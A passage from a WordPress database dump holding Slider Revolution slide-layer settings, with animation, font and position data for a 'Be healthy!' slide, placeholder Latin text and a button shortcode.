Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"2\":{\"text\":\"No vis summo prompta adipiscing, ad pri amet accusata. Magna ullum omittantur.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"397px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"195px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(14,6,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-2.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"}}','{\"1\":{\"text\":\"Be healthy!\",\"alias\":\"Quick Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"2\":{\"text\":\"Ne nec vivendum comprehensam, mundi comm odo usu no, an vix alterum percipit.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"397px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChil